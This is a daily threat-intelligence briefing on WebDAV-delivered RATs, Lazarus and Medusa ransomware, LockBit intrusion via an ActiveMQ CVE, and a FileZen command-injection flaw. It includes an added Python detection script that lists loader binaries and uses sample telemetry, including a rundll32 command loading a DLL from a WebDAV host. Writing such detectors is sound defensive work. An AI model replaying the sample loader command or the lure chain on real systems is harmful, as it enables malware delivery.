Daily Threat Briefing

Cyware Daily Threat Intelligence, February 25, 2026


Old dog, new tricks. Attackers are abusing Windows File Explorer WebDAV support to deliver multi-stage malware, with 87% of campaigns ending in RATs like XWorm RAT, AsyncRAT, and DcRAT.

Lazarus Group has aligned with Medusa ransomware (now RaaS) to financially target a Middle Eastern enterprise using tools like Comebacker and Blindingcan.

Attackers exploited Apache ActiveMQ (CVE-2023-46604), returned 18 days later via RDP, and deployed LockBit using Metasploit and AnyDesk for lateral movement.

Top Malware Reported in the Last 24 Hours

Windows File Explorer under siege

Threat actors exploit Windows File Explorer's support for WebDAV, a legacy HTTP-based file management protocol, to trick victims into downloading malware. WebDAV was deprecated in November 2023 and is rarely used today, which leaves it an obscure, easily overlooked attack vector. Campaigns using WebDAV for malware delivery have been active since February 2024 and often involve complex chains of payloads and legitimate files. Of the Active Threat Reports (ATRs) that use this tactic, 87% deliver multiple Remote Access Trojans (RATs) as final payloads, including XWorm RAT, AsyncRAT, and DcRAT.
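A defender-side check for the delivery path described above, written as an added example that is not from Cyware or the reports it summarizes: it scans constructed process-creation records for the UNC markers the Windows WebClient redirector leaves on WebDAV-mounted paths (@SSL, DavWWWRoot). The LOLBin list, record fields and sample hosts are assumptions made for this example.

```python
import re
from collections import namedtuple

# The WebClient redirector exposes a WebDAV share as a UNC path such as
# \\host@SSL@443\DavWWWRoot\... or \\host\DavWWWRoot\...; the "@SSL" and
# "DavWWWRoot" markers never appear in ordinary SMB paths, so they are a cheap
# indicator that a file was opened or executed straight from a WebDAV server.
WEBDAV_UNC = re.compile(r"\\\\([\w.\-]+)(@SSL)?(?:@\d+)?\\(DavWWWRoot\\)?", re.IGNORECASE)

# Script and loader hosts commonly used to run a downloaded stage (example list, tune per environment).
LOLBINS = {"rundll32.exe", "mshta.exe", "wscript.exe", "cscript.exe",
           "regsvr32.exe", "powershell.exe", "cmd.exe", "msiexec.exe"}

ProcEvent = namedtuple("ProcEvent", "parent image cmdline")  # stand-in for a Sysmon 1 / Security 4688 record
Alert = namedtuple("Alert", "severity host event")           # host: WebDAV server the file came from

def webdav_match(text: str):
    """First UNC path in text that carries a WebDAV marker, or None."""
    return next((m for m in WEBDAV_UNC.finditer(text) if m.group(2) or m.group(3)), None)

def scan_events(events) -> list:
    """Flag processes whose image or command line points at a WebDAV-mounted path."""
    alerts = []
    for ev in events:
        for field in (ev.image, ev.cmdline):
            m = webdav_match(field)
            if m:
                exe = ev.image.rsplit("\\", 1)[-1].lower()
                from_explorer = ev.parent.lower().endswith("explorer.exe")
                # Explorer launching a LOLBin or a binary from WebDAV matches the lure chain above.
                severity = "high" if exe in LOLBINS or from_explorer else "medium"
                alerts.append(Alert(severity, m.group(1), ev))
                break
    return alerts

# Constructed sample telemetry; 203.0.113.0/24 and example.test are reserved documentation values.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\rundll32.exe",
              r'rundll32.exe "\\203.0.113.10@SSL@443\DavWWWRoot\update\loader.dll",Run'),
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\notepad.exe",
              r"notepad.exe \\fileserver\shared\notes.txt"),                     # plain SMB: no alert
    ProcEvent(r"C:\Windows\explorer.exe", r"\\files.example.test@SSL\DavWWWRoot\Docs\invoice.exe",
              r'"\\files.example.test@SSL\DavWWWRoot\Docs\invoice.exe"'),
    ProcEvent(r"C:\Windows\System32\cmd.exe", r"C:\Tools\7z.exe",
              r"7z.exe x \\backup.example.test\DavWWWRoot\archive.7z"),
]

if __name__ == "__main__":
    for a in scan_events(SAMPLE_EVENTS):
        print(f"[{a.severity}] {a.host}: {a.event.cmdline}")
```

In production the same regex can be applied to Sysmon event 1 CommandLine/Image fields or Security 4688 records; a WebClient service start (svchost.exe -s WebClient) shortly before such an event is a useful corroborating signal.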

North Korean cybercriminals target critical infrastructure

The Lazarus Group, a North Korean state-sponsored threat actor, has partnered with Medusa ransomware for recent attacks. Medusa ransomware transitioned to a ransomware-as-a-service (RaaS) model in 2024, aligning with Lazarus's history of extortion and financially motivated cybercrime. The Middle Eastern target was a large business, attacked purely for financial gain rather than for strategic or intellectual-property reasons. Lazarus used additional malware in the attacks, including the Comebacker backdoor, Blindingcan RAT, and Infohook infostealer. The group employs tactics such as "bring-your-own-vulnerable-driver" (BYOVD) to bypass security defenses.

Top Vulnerabilities Reported in the Last 24 Hours

Apache ActiveMQ vulnerability exploited

In a recent cyberattack, threat actors exploited a vulnerability (CVE-2023-46604) in an Apache ActiveMQ server to gain initial access to an organization's network. Despite being evicted after the first breach, they returned 18 days later and successfully re-compromised the system. Using Remote Desktop Protocol (RDP) and credentials obtained during the first attack, they deployed LockBit ransomware, encrypting files across multiple systems. The attackers used tools such as Metasploit, AnyDesk, and Windows CertUtil to escalate privileges, move laterally within the network, and maintain persistence.

Critical OS Command Injection flaw in FileZen

CISA has issued an alert about the active exploitation of a critical OS Command Injection vulnerability (CVE-2026-25108) in FileZen, a file-sharing product by Soliton Systems K.K. This vulnerability can allow attackers to execute arbitrary OS commands, potentially leading to full system compromise. Federal agencies are mandated to address this vulnerability within a specific timeframe, and CISA strongly advises all organizations to prioritize patching and mitigation efforts to protect against cyber threats.
